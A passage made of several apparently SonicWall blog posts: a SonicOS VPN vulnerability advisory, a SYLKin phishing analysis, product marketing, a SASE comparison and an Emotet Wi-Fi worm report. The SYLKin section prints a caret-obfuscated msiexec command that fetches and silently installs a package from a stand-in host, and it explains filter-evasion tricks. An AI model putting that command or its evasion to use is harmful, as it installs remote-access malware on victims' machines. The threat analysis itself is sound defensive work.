A critical stack-based Buffer Overflow vulnerability has been discovered in SonicWall VPNs.
When exploited, it allows unauthenticated remote attackers to execute arbitrary code on the impacted devices.
Tracked as CVE-2020-5135, the vulnerability impacts multiple versions of SonicOS ran by hundreds of thousands of active VPNs.
Craig Young of Tripwire Vulnerability and Exposure Research Team (VERT) and Nikita Abramov of Positive Technologies have been credited with discovering and reporting the vulnerability.
Shodan lists over 800,000 devices
Given an increase in employees working remotely and the reliance on corporate VPNs, easily exploitable flaws like these are concerning when it comes to security.
As confirmed by Tenable researchers and observed by BleepingComputer, as of today, Shodan shows over 800,000 VPN devices running vulnerable SonicOS software versions, depending on the search term used.
Although a Proof-of-Concept (POC) exploit is not yet available in the wild, the vast attack surface available to adversaries means companies should upgrade their devices immediately.
The following SonicWall VPN devices are impacted by CVE-2020-5135:
SonicOS 6.5.4.7-79n and earlier
SonicOS 6.5.1.11-4n and earlier
SonicOS 6.0.5.3-93o and earlier
SonicOSv 6.5.4.4-44v-21-794 and earlier
SonicOS 7.0.0.0-1
“SonicWall has released updates to remediate this flaw. SSL VPN portals may be disconnected from the Internet as a temporary mitigation before the patch is applied,” stated Tripwire VERT’s advisory.
The following versions are available to upgrade to for safeguarding against this vulnerability:
SonicOS 6.5.4.7-83n
SonicOS 6.5.1.12-1n
SonicOS 6.0.5.3-94o
SonicOS 6.5.4.v-21s-987
Gen 7 7.0.0.0-2 and onwards
Provided the vast number of devices that are still running the outdated SonicOS versions and the critical nature of this vulnerability, complete research findings on CVE-2020-5135 are expected to be released once enough users have patched their systems.
With the definition of normal changing with each passing day, the ongoing pandemic has forced security professionals to re-evaluate new working models and how they can prevent attackers from targeting end users. Albert Einstein once said, “In the midst of every crisis lies great opportunity,” and this idea has formed the basis for how cybercriminals operate in the era of COVID-19.
Never ones to let an opportunity go to waste, cybercriminals are deploying new attacks each day. Microsoft was recently affected by a new SYLKIN Attack that bypasses both Microsoft 365 default security (EOP) and Microsoft advanced security (ATP). At the time of writing, Microsoft 365 is still vulnerable, and the attack is still being used extensively against Microsoft 365 customers.
Lately Avanan’s security analysts have detected a significant increase in the usage of SLK files in attacks against Microsoft 365 customers. In these attacks, hackers send an email with a .slk attachment that contains a malicious macro (msiexec script) to download and install a remote access trojan.
It is a very sophisticated attack with several obfuscation methods specifically designed to bypass Microsoft 365. Gmail customers, on other hand, are safe from this attack — Google already blocks it on incoming email and has made it impossible to send these SLK files as an attachment from a Gmail account.
What is SYLKin attack?
Again, SLK files are rare, so if you have received one in your inbox, chances are you are being targeted by the most recent Remote Access Trojan malware that has been ‘upgraded’ to bypass Microsoft ATP. The attack method itself has been extensivelydocumented, so I’ll only explain it briefly. The focus will be on how such a well-understood attack bypassed Office 365 filters, including Microsoft ATP.
The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations.
Emails are targeted and manually created
The attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer using a topic that is highly specific to the organization and the individual. For example, an email to a manufacturer will discuss parts specifications, an email to a tech firm will ask for changes to a large electronics order, or an email to a government department will discuss legal concerns. The subjects, contents and even the attached files are customized with the target’s name and organization. No two are alike. What they have in common is that the messages are realistic and compelling enough to convince a user to click on the attached SLK file.
What is a SLK file?
A so-called “Symbolic Link” (SLK) file is Microsoft’s human-readable, text-based spreadsheet format that saw its last update around the time that “Dallas” went off the air in 1986. At a time when XLS files were proprietary, SLK was an open-format alternative before XLSX was introduced in 2007. To the end user, a SLK file looks like an Excel document — but for an attacker, it’s an easy way to bypass Microsoft 365 security, even for accounts protected with Microsoft ATP.
What does this attack do?
A recent version of the SYLK attack includes an SLK file with an obfuscated macro designed to run a command on a Windows machine:
This runs Windows Installer (msiexec) in quiet mode to install whatever MSI package they decide to host on their site. In this campaign, it’s a hacked version of the off-the-shelf NetSupport remote control application, granting the attacker full control over the desktop.
Windows grants more trust to SLK files than XLSX files
Because Windows “Protected View” does not apply to SLK files downloaded from the Internet or from email, Excel does not open them in read-only mode.
When opening an SLK file, the end user does not see this message:
Targeted methodology to bypass Microsoft Advanced Threat Protection
The first versions of the SLK attack method were seen in 2018 and were eventually blocked by Microsoft ATP. This new campaign, however, includes a number of obfuscation techniques specifically designed to bypass Microsoft ATP.
The attack was sent from hundreds of free hotmail accounts
The macro script includes ‘^’ characters to confuse ATP filters.
The URL was split in two so that ATP would not read it as a web link,
The hosting server became active after the email was sent so it seemed benign if sandboxed by ATP,
The hosting server only responded to “Windows Installer” user agents, ignoring other queries.
These methods are ATP-specific. Again, Gmail blocks these files and, in fact, makes it impossible to send from a Gmail account.
The attackers took advantage of a series of blind spots in the Microsoft email infrastructure to send this attack from thousands of disposable Hotmail accounts, with email addresses in the format “randomwords1982@hotmail.com,” each sending just a handful or messages at a time.
An important benefit of Hotmail to many attackers is that the same security filters are being used end to end. If the attacker is able to attach and send a file, it is likely that it will make it through the entire Microsoft security infrastructure. Should one of the accounts get flagged, Microsoft will disable it, informing the attacker that his messages are getting caught downstream.
While most of the well-known anonymous email-sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged with its own Outlook application, Microsoft seems to grant them a higher level of trust than external senders.
The macro script includes escape characters to confuse ATP filters
The attackers take advantage of the fact that ATP filters do not interpret text in the same way as the Windows command line. ATP would normally be able to identify the powerful and potentially malicious msiexec command, but the attackers inserted command-line escape characters ‘^’ to obfuscate the script.
When read by Advanced Threat Protection filters, the msiexec command becomes unreadable and the telltale ‘http://’ is obscured.
When read by the desktop command line, the escape characters ‘disappear,’ running as if they were never there. This is just a command-line version of the Zero-Font methodologies that have plagued ATP for years.
The URL was split into two macros so that ATP would not read it as a link
ATP does not need to see the ‘http://’ to recognize a web link and would normally catch any text of the format ‘malicious-site.com.’ In order to hide the link, the attackers split it into two separate commands.
The first macro command creates a batch file with the first half of the URL.
Set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JbfoT.bat
The second macro command adds the remainder of the URL and then runs the batch file.
Set /p=””e.com/install.php ^/q”” >> JbfoT.bat & JbfoT.bat
Within seconds, the malicious SLK file has run two simple commands to create a malicious install script and begin installing whatever software the attackers decide to host.
The hosting server was armed after the message was sent
We don’t believe Microsoft ATP is testing these files within their sandbox environment, relying instead on static filters. But we have found that other vendors have also failed to catch this attack, even when the code is executed in a virtual environment.
There is no special code or intelligence within the script to detect if it is running within emulation. Instead, the attackers do not enable the malicious web server until shortly after the email is sent. Because it cannot reach the server, the script fails, installing nothing.
In addition to enabling the URL only after delivery, the server would become inactive a few hours later, rejecting further queries. This seems to be a way to avoid action from their provider, as the reported content is no longer available at the links associated with the attack by the time a manual take-down notice is requested.
The coordinated timing of the hosting servers with the sending of the emails is characteristic of a more sophisticated campaign. When combined with the high-profile nature of the targeted organizations, it suggests an APT group or state actor.
The hosting server only responded to requests from “Windows Installer” agents
In addition to their on-and-off timing, the hosting servers utilized another common technique to avoid analysis, rejecting all queries except for those with User Agent: Windows Installer. This ensured that it only responded to the malicious script and would avoid detection by URL analysis tools.
How did it evade Microsoft protection?
Each of the obfuscation methodologies were designed to bypass a specific layer of the Microsoft 365 security infrastructure. While we understand how each was used in turn, we are still confused as to how ATP fails to detect this technique in emulation. Creating a batch file and calling the msiexec application is considered malicious, even if it fails to run. We must assume, then, that none of these files are being tested by the sandbox layer. Unfortunately, because each file is unique, no two attachments have the same MD5 hash, which requires each file to be given additional scrutiny.
Got SonicWall CAS protecting your inbox? Don’t worry, we have you protected.
If you have SonicWall Cloud App Security protecting your organization’s inbox and you are running in Protect (Inline) mode, this attack is blocked, and users will not see these attacks in their inbox. (If you are in Monitor Mode, we recommend that you move to Protect (Inline) mode.)
Alternatively, we recommend you configure your Office 365 account to reject files of this type. SLK files are relatively rare, so unless you have a legacy reason to allow them, we recommend excluding the SLK extension as a static mail-flow rule, at least until Microsoft fixes this gap.
Businesses are embracing digital transformation, bringing about a new era of the anytime, anywhere business. Staffed by flexible employees and built on the principle of a distributed enterprise, the resulting proliferation of applications and data presents organizations with a major security challenge.
As enterprises grow, they must proactively manage security across several different locations: at headquarters, at software-defined branches (SD-Branches), at co-located data centers or in a variety of cloud locations. These locations are not siloed — applications and data move dynamically between them, forcing security to follow.
SonicWall physical and virtual firewalls provide high-performance security across a wide range of enterprises, but protecting all these security vectors requires the ability to consistently apply the right security policy to the right network control point — while keeping in mind that some security failures can be attributed to ineffective policies or misconfigurations.
To ensure effective policy provisioning, enterprises need dynamic visibility across the network. They need a boundless approach to network security policy management.
The SonicOS or SonicOSX architecture is at the core of every SonicWall physical and virtual firewall, including the TZ, NSa, NSv and NSsp Series. Our operating systems leverage our patented, single-pass, low-latency, Reassembly-Free Deep Packet Inspection® (RFDPI) and patent-pending Real-Time Deep Memory Inspection™ (RTDMI) technologies to deliver industry-validated high security effectiveness, Secure SD-WAN, real-time visualization, high-speed virtual private networking (VPN) and other robust security features.
The latest TZ570/670 Series firewalls run on the brand-new SonicOS 7.0, which features advanced security, simplified policy management, and critical networking and management capabilities — all designed to meet the needs of distributed enterprises with next-gen SD-Branches and small- to medium-sized businesses.
With the introduction of the brand-new SonicOSX 7.0 and SonicOS 7.0, the SonicOS operating system is setting a new standard for usability. Built from the ground up, SonicOSX 7.0 architecture features Unified Policy management, which offers integrated management of various security policies for enterprise-grade firewalls such as SonicWall NSsp and NSv firewall series.
This OS upgrade brings about multi-instance support on NSsp series firewalls. Multi-instance is the next generation of multi-tenancy, where each tenant is isolated with dedicated compute resources to avoid resource starvation.
SonicOSX 7 also provides unified policy to provision L3 to L7 controls in a single rule base on every firewall, providing admins a centralized location for configuring policies. It comes with a new web interface born from a radically different approach: a user-first design emphasis. SonicOSX’s web-based interface presents meaningful visualizations of threat information, and displays actionable alerts prompting you to configure contextual security policies with point-and-click simplicity.
In addition to being more user friendly, the new interface is also more attractive than the classic version. In a single-pane view of a firewall, the interface presents the user with information on the effectiveness of various security rules. The user is then able to modify the predefined rules for gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, and deep-packet inspection of encrypted traffic in a seamless fashion. With Unified Policy, SonicWall delivers a more streamlined experience that reduces configuration errors and deployment time for a better overall security posture.
The Unified Policy gives your organization the ability to control dynamic traffic passing through a firewall and provides visibility and insight into the disparate policies that affect gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, deep-packet inspection of encrypted traffic and more. It helps simplify management tasks, reduce configuration errors and speed up deployment time, which all contribute to a better overall security posture.
There’s nothing normal about the “new business normal.” The past few months have represented a complete shift in the way we think of work — and with vastly more employees working remotely than ever before, bringing with them an unprecedented quantity of exposure points and risk, the traditional cybersecurity model is proving woefully inadequate.
As cybercriminals ramp up attacks on anyone they perceive to be vulnerable, it isn’t enough to simply enable working from home. To truly ensure business continuity, you must secure and rearchitect these massively distributed networks with a platform capable of stopping the ever-increasing number of threats — both known and unknown.
Many businesses need to secure remote branch offices and retail stores, but it often isn’t possible — or practical — to have dedicated IT staff at each of these locations. SonicWall SD-Branch enables your organization to provide seamless connectivity that keeps pace with escalating bandwidth demands, and allows you to quickly and cost-effectively upgrade the network security at your remote locations.
Secure SD-Branch is a comprehensive solution that combines the power of secure SD-WAN, secure wireless and wired LAN technology with zero-touch deployment. Through the power of Capture Security Center — SonicWall’s cloud-based, single-pane-of-glass management console — the management, reporting and analytics for all locations is centralized and accessible from any web-enabled device.
SonicWall Switches
The shift to remote work has resulted in a sudden rise in the use of high-bandwidth applications — something that can easily overwhelm branch networks. At the same time, monitoring, managing and continually refreshing a growing number of network devices across multiple branches has grown exponentially more difficult, especially since many branch locations don’t have trained IT staff.
SonicWall Switches offer multi-gigabit wired performance that lets you rapidly scale your branch networks through remote installation. Available in seven models — ranging from eight to 48 ports, with gigabit and 10 gigabit ethernet ports — SonicWall Switches deliver network switching that accommodates the growing number of mobile and IoT devices in branch locations and provides the network performance needed to support cloud-delivered applications. SonicWall Switches also fit seamlessly into your existing SonicWall ecosystem, helping you to unify your network security posture. They’re SD-Branch-ready and managed via firewalls — either locally or through SonicWall’s cloud-based Capture Security Center — for unified, single-pane-of-glass management of your entire SonicWall infrastructure.
SonicWall Capture Client 3.0
SonicWall Capture Client 3.0 allows employees to operate remotely without having to worry to about advanced threats, all while giving administrators comprehensive visibility and the ability to extend standard protections to remote endpoints. SonicWall Capture Client 3.0 is the latest iteration of our lightweight, unified endpoint protection platform, and features a number of new and upgraded features.
Capture Client 3.0’s comprehensive, client-based content filtering allows you to easily extend network-based content filtering to off-network users. It provides HTTP and HTTPS traffic inspection capabilities, along with the ability to assign exclusions for trusted applications or blacklist untrusted applications. Capture Client also offers real-time visibility of applications and identifies vulnerabilities.
Starting with Capture Client 3.0, administrators can leverage Azure active directory properties for granular policy assignment based on categories such as group membership — regardless of whether the directory is hosted on-prem or in the cloud.
Capture Client 3.0 also brings in support for the SentinelOne Linux agent, enabling you to extend next-generation antimalware capabilities to Linux servers. This feature will allow customers to safeguard Linux-based workloads irrespective of their location — on-prem or in the cloud.
As more businesses leverage remote, mobile, and temporary workforces, the elements of business continuity planning are evolving and requiring that IT professionals look deep into the nuts and bolts of connectivity.
CISOs and their team members are facing new challenges each and every day, many of which have been driven by digital transformation, as well as the adoption of other productivity-enhancing technologies.
A case in point is the rapidly evolving need to support remote and mobile users as businesses change how they interact with staffers.
For example, the recent COVID-19 crisis has forced the majority of businesses worldwide to support employees that work from home or other remote locations.
Many businesses are encountering numerous problems with connection reliability, as well as the challenges presented by rapidly scaling connectivity to meet a growing number of remote workers.
Add to that security and privacy issues, and it becomes evident that CISOs may very well face what may become insurmountable challenges to keep things working and secure.
It is the potential for disruption that is bringing Business Continuity Planning (BCP) to the forefront of many IT conversations. What's more, many IT professionals are quickly coming to the conclusion that persistent WAN and Internet connectivity prove to be the foundation of an effective business continuity plan.
VPNs are Failing to Deliver
Virtual Private Networks (VPNs) are often the first choice for creating secure connections into a corporate network from the outside world.
However, VPNs have initially been designed to allow a remote endpoint to attach to an internal local area network and grant that system access to data and applications stored on the network.
For occasional connectivity, with a focus on ease of use.
Yet, VPNs are quickly beginning to show their limitations when placed under the demand for supporting a rapidly deployed remote workforce.
One of the most significant issues around VPNs comes in the context of scalability; in other words, VPNs can be complicated to scale quickly.
For the most part, VPNs are licensed by connection and are supported by an appliance on the network side to encrypt and decrypt traffic. The more VPN users that are added, the more licenses and processing power that is needed, which ultimately adds unforeseen costs, as well as introducing additional latency into the network.
Eventually, VPNs can break under strain, and that creates an issue around business continuity. Simply put, if VPNs become overwhelmed by increased traffic, connectivity may fail, and the ability for employees to access the network may be impacted, the concept of business continuity suffers as a result.
VPNs are also used for site to site connections, where the bandwidth may be shared not only from a branch office to a headquarters office but also with remote users. A situation such as that can completely derail an organization's ability to do business if those VPNs fail.
Perhaps an even bigger concern with VPNs comes in the form of cybersecurity. VPNs that are used to give remote users access to a network are only as reliable as the credentials that are given to those remote users.
In some cases, users may share password and login information with others, or carelessly expose their systems to intrusion or theft. Ultimately, VPNs may pave the way for attacks on the corporate network by allowing bad actors to access systems.
ZTNA Moves Beyond VPNs
With VPN technology becoming suspect in the rapid expansion of remote workforces, CISOs and IT pros are looking for alternatives to ensure reliable and secure connections into the network from remote workers.
The desire to bridge security and reliability is driven by continuity, as well as operational issues. CISOs are looking to keep costs down, provide a level of security, without compromising performance, and still meet projected growth.
Many enterprises thought that the answer to the VPN dilemma could be found in SDP (Software Defined Perimeters) or ZTNA (Zero Trust Network Access), two acronyms that have become interchangeable in the arena of cybersecurity.
ZTNA has been built for the cloud as a solution that shifted security from the network to the applications. In other words, ZTNA is application-centric, meaning that users are granted access to applications and not the complete network.
Of course, ZTNA does much more than that. ZTNA can "hide" applications, while still granting access to authorized users. Unlike VPNs, ZTNA technology does not broadcast any information outside of the network for authentication, whereas VPN concentrators sit at the edge of the network for all to see, making them a target for malicious attackers.
What's more, ZTNA uses inside-out connections, which means IP addresses are never exposed to the internet. Instead of granting access to the network like a VPN, ZTNA technology uses a micro-segmentation approach, where a secure segment is created between the end-user and the named application.
ZTNA creates an access environment that provides private access to an application for an individual user, and only grants the lowest level of privileges to that user.
ZTNA technology decouples access to applications from access to the network, creating a new paradigm of connectivity. ZTNA based solutions also capture much more information than a VPN, which helps with analytics and security planning.
While a VPN may only track a device's IP address, port data, and protocols, ZTNA solutions capture data around the user identity, named application, latency, locations, and much more. It creates an environment that allows administrators to be more proactive and more easily consume and analyze the information.
While ZTNA may be a monumental step forward from legacy VPN systems, ZTNA solutions are not without their own concerns. ZTNA solutions do not address performance and scalability issues and may lack the core components of continuity, such as failover and automated rerouting of traffic.
In other words, ZTNA may require those additional third-party solutions to be added to the mix to support BCP.
Resolving ZTNA and VPN issues with SASE
A newer technology, which goes by the moniker of SASE (Secure Access Service Edge), may very well have the answer to the dilemmas of security, continuity, and scale that both ZTNA and VPNs introduce into the networking equation.
The Secure Access Service Edge (SASE) model was proposed by Gartner's leading security analysts, Neil MacDonald, Lawrence Orans, and Joe Skorupa. Gartner presents SASE as a way to collapse the networking and security stacks of SD-WANs into a fully integrated offering that is both easy to deploy and manage.
Gartner sees SASE as a game-changer in the world of wide-area networking and cloud connectivity. The research house expects 40% of enterprises to adopt SASE by 2024. However, a significant challenge remains, networking and cybersecurity vendors are still building their SASE offerings, and very few are actually available at this time.
One such vendor is Cato Networks, which offers a fully baked SASE solution and has been identified as one of the leaders in the SASE game by Gartner.
SASE differs significantly from the VPN and ZTNA models by leveraging a native cloud architecture that is built on the concepts of SD-WAN (Software-Defined Wide Area Network). According to Gartner, SASE is an identity-driven connectivity platform that uses a native cloud architecture to support secure connectivity at the network edge that is globally distributed.
SASE gives organizations access to what is essentially a private networking backbone that runs within the global internet. What's more, SASE incorporates automated failover, AI-driven performance tuning, and multiple secure paths into the private backbone.
SASE is deployed at the edge of the network, where the LAN connects to the public internet to access cloud or other services. And as with other SD-WAN offerings, the edge has to connect to something beyond the four walls of the private network.
In Cato's case, the company has created a global private backbone, which is connected via multiple network providers. Cato has built a private cloud that can be reached over the public internet.
SASE also offers the ability to combine the benefits of SDP with the resiliency of an SD-WAN, without introducing any of the shortcomings of a VPN.
Case in point is Cato's Instant Access, a clientless connectivity model that uses a Software-Defined Perimeter (SDP) solution to grant secure access to cloud-delivered applications for authorized remote users.
Instant access offers multi-factor authentication, single sign-on, least privileged access, and is incorporated into the combined networking and security stacks. Since it is built on SASE, full administrator visibility is a reality, as well as simplified deployment, instant scalability, integrated performance management, and automated failover.
In Cato's case, continuous threat protection keeps remote workers, as well as the network, safe from network-based threats. Cato's security stack includes NGFW, SWG, IPS, advanced anti-malware, and Managed Threat Detection and Response (MDR) service. Of course, Cato isn't the only player in the SASE game; other vendors pushing into SASE territory include Cisco, Akamai, Palo Alto Networks, Symantec, VMWare, and Netskope.
SASE Address the Problems of VPNs, ZTNA -- and More
With VPNs coming up short and ZTNA lacking critical functionality, such as ease of scale and performance management, it is quickly becoming evident that CISOs may need to take a long hard look at SASE.
SASE addresses the all too common problems that VPNs are introducing into a rapidly evolving remote work paradigm, while still offering the application-centric security that ZTNA brings to the table.
What's more, SASE brings with it advanced security, enhanced visibility, and reliability that will go a long way to improving continuity, while also potentially lowering costs.
If you had asked them in January, most organizations would probably have said things were humming along smoothly. Economic growth was strong, and in most cases budgets and security plans were being created and carried out without any need or intention to disrupt the status quo.
Then the entire world changed.
Within the space of a couple weeks, bustling offices were deserted one by one as federal, state, provincial and local governments issued stay-at-home and shelter-in-place orders, and employees boxed up their essential belongings and became part of the rapidly expanding global remote workforce.
While these moves were necessary to stem the spread of COVID-19, the disruption that this sudden change brought with it introduced a set of problems most businesses were ill-equipped to manage.
Companies that previously felt confident in their cybersecurity strategy suddenly found that they didn’t have the capacity or licenses to secure a full-scale mobile workforce. Worse, they needed to manage employees ill-prepared for the transition, many of whom didn’t understand the additional precautions required for safe remote work.
For hackers, though, these are the salad days — and the combination of inexperienced employees and unprepared businesses has brought them out in force. According to Reuters, hacking activity targeting corporations in the U.S. and elsewhere more than doubled in March, and preliminary reports show much the same for April. These threats highlight the urgent need for scalable Secure Remote Access and VPN license capacity to handle the new influx of remote employees while offering the same level of security offered on-prem.
Greater capacity for increased security
To help small- and medium-sized businesses (SMB) handle a rapidly expanding remote workforce, SonicWall has improved the scalability of its SMA 210 and 410 appliances — the 210 can now manage up to 200 remote VPN users, and the 410 can now support 400.
Many enterprises, governments and MSSPs are facing issues with scalability, too. To handle the influx of remote users on large distributed networks, the SonicWall SMA 1000 series allows these organizations to scale up to a million remote VPN users.
New public cloud options for the ‘new business normal’
The remote-work revolution coincides with another major shift in how enterprises work — the ongoing cloud transformation. The benefits of moving to a public cloud are myriad — including cost savings, greater agility, maximum uptime and quick and easy deployment.
While SonicWall has long supported private clouds, such as VMware ESXi and Microsoft Hyper-V, SonicWall SMA 500v and SMA 8200v virtual appliances can now be launched on AWS or Microsoft Azure, allowing businesses to realize these benefits at a time when they may need them the most.
Protect remote workers with special offers on SMA, VPN
Right now, budget concerns are at the forefront for many businesses. To help both new and existing customers implement necessary security during this time of crisis, SonicWall has launched several new ‘Work From Home Securely’ promotions to ensure organizations can implement comprehensive security in a cost-effective way.
New 30- and 60-day spike licensing options to support short-term remote capacity increases
With SonicWall’s new Work From Home Securely special offers on SMA and other solutions, there’s never been a better time — or a more crucial time — to secure your remote workforce
Tested with 465 combined Public and Private Common Vulnerability and Exposure (CVE) vulnerabilities at the InterOperability Laboratory of the University of New Hampshire, the SonicWall NSa 4650 firewall achieved 100% security effectiveness against all private CVEs used in the test — CVEs unknown to NGFW vendors. Overall, SonicWall rated 99% when factoring in the results of the public CVE test.
“This apples-to-apples comparison provides security buyers with validation of real-world performance and security effectiveness of next-generation firewalls when fully configured for realistic conditions,” said Atul Dhablania, Senior Vice President and Chief Operating Officer, SonicWall, in the official announcement.
Testing firewalls in real-world conditions
The NetSecOPEN open standard is designed to simulate various permutations of real-world test conditions, specifically to address the challenges faced by security professionals when measuring and determining if the tested firewall is performing the way vendors had promised. The value of this service is maximized when test findings help you make clear and conclusive product decisions based on incontrovertible evidence.
SonicWall is among the first to excelled in one of the industry’s most comprehensive, rigorous benchmark tests ever created for NGFW. In summary, the NetSecOPEN Test Report reveals that the SonicWall NSa 4650 NFGW:
Demonstrated one of the highest security effectiveness ratings in the industry
Blocked 100% of attacks against all private vulnerabilities used in the test
Blocked 99% overall all attacks, private and public
Affirmed its extremely high-performing and scalable enterprise security platform can meet the security and massive data and capacity demands of the largest of data centers
Firewall testing methodologies, metrics
Key performance indications (KPI), such as throughput, latency and other (see below) metrics, are important in determining products’ acceptability. These KPIs were recorded during NetSecOPEN testing using standard recommended firewall configurations and security features typically used in a real-world use case condition.
KPI
MEANING
INTERPRETATION
CPS
TCP Connections Per Second
Measures the average established TCP connections per second in the sustaining period. For “TCP/HTTP(S) Connection Per Second” benchmarking test scenario, the KPI is measured average established and terminated TCP connections per second simultaneously.
TPUT
Throughput
Measures the average Layer 2 throughput within the sustaining period as well as average packets per seconds within the same period. The value of throughput is expressed in Kbit/s.
TPS
Application Transactions Per Second
Measures the average successfully completed application transactions per second in the sustaining period.
TTFB
Time to First Byte
Measure the minimum, maximum and average time to first byte. TTFB is the elapsed time between sending the SYN packet from the client and receiving the first byte of application date from the DUT/SUT. TTFB SHOULD be expressed in millisecond.
TTLB
Time to Last Byte
Measures the minimum, maximum and average per URL response time in the sustaining period. The latency is measured at Client and in this case would be the time duration between sending a GET request from Client and the receival of the complete response from the server.
CC
Concurrent TCP Connections
Measures the average concurrent open TCP connections in the sustaining period.
Importance of transparent testing of cybersecurity products
Before making an important business-critical purchase decision that is central to the cyber-defense of an organization, decision-makers likely spent countless days exercising due diligence. This may include conducting extensive vendor research, catching up on analyst opinions and insights, going through various online forums and communities, seeking peer recommendations and, more importantly, finding that one trustworthy third-party review that can help guide your purchase decision.
Unfortunately, locating such reviews can be a bewildering exercise as most third-party testing vendors and their methodologies are not well-defined nor do they follow established open standards and criteria for testing and benchmarking NGFW performance.
Recognizing the fact that customers often rely on third-party reviews to validate vendors’ claims, SonicWall joined NetSecOPEN in December 2018, the first industry organization focused on the creation of open, transparent network security performance testing standards adopted by the Internet Engineering Task Force (IETF), as one of its first founding member.
SonicWall recognizes NetSecOPEN for its reputation as an independent and unbiased product test and validation organization. We endorse its IETF initiative, open standards and benchmarking methodology for network security device performance.
As a contributing member, SonicWall actively works with NetSecOPEN and other members to help define, refine and establish repeatable and consistent testing procedures, parameters, configurations, measurements and KPIs to produce what NetSecOPEN declares as a fair and reasonable comparison across all network security functions. This should give organizations total transparency about cybersecurity vendors and their products’ performance.
The new tactic used by Emotet allows the malware to infect nearby insecure Wi-Fi networks – and their devices – via brute force loops.
A newly uncovered Emotet malware sample has the ability to spread to insecure Wi-Fi networks that are located nearby to an infected device.
If the malware can spread to these nearby Wi-Fi networks, it then attempts to infect devices connected to them — a tactic that can rapidly escalate Emotet’s spread, said researchers. The new development is particularly dangerous for the already-prevalent Emotet malware, which since its return in September has taken on new evasion and social engineering tactics to steal credentials and spread trojans to victims (like the United Nations) .
“With this newly discovered loader-type used by Emotet, a new threat vector is introduced to Emotet’s capabilities,” said James Quinn, threat researcher and malware analyst for Binary Defense, in a Friday analysis. “Previously thought to only spread through malspam and infected networks, Emotet can use this loader-type to spread through nearby wireless networks if the networks use insecure passwords.”
While researchers noticed the Wi-Fi spreading binary being delivered for the first time on Jan. 23, they said that the executable has a timestamp of 4/16/2018, hinting that the Wi-Fi spreading behavior has been running unnoticed for almost two years. This may be in part due to how infrequently the binary is dropped, researchers said, as this is the first time they’ve seen it despite tracking Emotet since its return in 2019.
Emotet Spread
The Emotet sample first infects the initial system with a self-extracting RAR file, containing two binaries (worm.exe and service.exe) used for the Wi-Fi spreading. After the RAR file unpacks itself, Worm.exe executes automatically.
The worm.exe binary immediately begins profiling wireless networks in order to attempt to spread to other Wi-Fi networks. Emotet makes use of the wlanAPI interface to do this. wlanAPI is one of the libraries used by the native Wi-Fi application programming interface (API) to manage wireless network profiles and wireless network connections.
Once a Wi-Fi handle has been obtained, the malware then calls WlanEnumInterfaces, a function that enumerates all Wi-Fi networks currently available on the victims’ system. The function returns the enumerated wireless networks in a series of structures that contain all information related to them (including their SSID, signal, encryption and network authentication method).
Once the data for each network has been obtained, the malware moves into the connection with “brute-forcing loops.” Attackers use a password obtained from “internal password lists” (it’s not clear how this internal password list has been obtained) to attempt to make the connection. If the connection is not successful, the function loops and moves to the next password on the password list.
If the password is correct and the connection is successful, the malware sleeps for 14 seconds before sending an HTTP POST to its command-and-control (C2) server on port 8080, and establishes the connection to the Wi-Fi network.
Then, the binary begins enumerating and attempting to brute-force passwords for all users (including any Administrator accounts) on the newly-infected network. If any of these brute forces are successful, worm.exe then installs the other binary, service.exe, onto the infected devices. To gain persistence on the system, the binary is installed under the guise of “Windows Defender System Service” (WinDefService).
“With buffers containing either a list of all usernames successfully brute-forced and their passwords, or the administrator account and its password, worm.exe can now begin spreading service.exe to other systems,” said researchers. “Service.exe is the infected payload installed on remote systems by worm.exe. This binary has a PE timestamp of 01/23/2020, which was the date it was first found by Binary Defense.”
After service.exe is installed and communicates back to the C2, it begins dropping the embedded Emotet executable. In this manner, the malware attempts to infect as many devices as possible.
Protecting Against Emotet
Emotet, which started as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism, can install a collection of malware on victim machines, including information stealers, email harvesters, self-propagation mechanisms and ransomware.
Researchers, for their part, recommend blocking this new Emotet technique with the use of strong passwords to secure wireless networks.
“Detection strategies for this threat include active monitoring of endpoints for new services being installed and investigating suspicious services or any processes running from temporary folders and user profile application data folders,” they said. “Network monitoring is also an effective detection, since the communications are unencrypted and there are recognizable patterns that identify the malware message content.”
The novel coronavirus epidemic is a major global health concern. To help prevent the spread of the new virus, organizations, businesses and enterprises are protecting their workforce and allowing employees to work remotely. This practice helps limit individual contact with large groups or crowds (e.g., restaurants, offices, transit) where viruses can easily spread.
As such, ‘stay at home’ is a common phrase in many health-conscious regions this week. According to the BBC, the city of Suzhou said businesses would remain closed until Feb 8, if not longer. As of 2018, Suzhou had a population of more than 10.7 million people.
Precautions like these are causing unexpected increases in mobile workers; many organizations don’t have enough virtual private network (VPN) licenses to accommodate the increase of users. This is a serious risk as employees will either not have access to business resources or, worse, they will do so via non-secure connections.
If you are a current SonicWall SMA 100 or 1000 series customer, or have Central Management Server (CMS) licenses, SonicWall will help implement complimentary 10-day spike licenses to help temporarily manage the increase in VPN capacity. Contact SonicWall or your SonicWall SecureFirst partner for assistance.
What is the coronavirus?
Coronavirus (2019-nCoV) is a respiratory illness first identified in Wuhan, China, but cases have since been reported in the U.S., Canada, Australia, Germany, France, Thailand, Japan, Hong Kong, and nine other countries. In an effort to contain the virus, the Chinese authorities have suspended air and rail travel in the area around Wuhan.
According to Centers for Disease Control and Prevention (CDC), early patients in the outbreak in China “reportedly had some link to a large seafood and animal market, suggesting animal-to-person spread. However, a growing number of patients reportedly have not had exposure to animal markets, indicating person-to-person spread is occurring. At this time, it’s unclear how easily or sustainably this virus is spreading between people.”
To protect the corporate network, IT must recognize that no mobile device should be trusted and that all access outside the corporate network is beyond IT control.
A combined Clean VPN approach delivers all of the security and SSL VPN elements of an integrated Clean VPN deployment, plus the additional SonicWall SMA capability to perform device interrogation and enforce policy-based endpoint controls.
For cybercriminals and threat actors, the digital frontier is a lawless panorama of targets and opportunity. Despite the best intentions of government agencies, law enforcement and oversight groups, the modern cyber threat landscape is more agile and evasive than ever before.
For this reason, SonicWall Capture Labs threat researchers work tirelessly to arm organizations, enterprises, governments and businesses with actionable threat intelligence to stay ahead in the global cyber arms race.
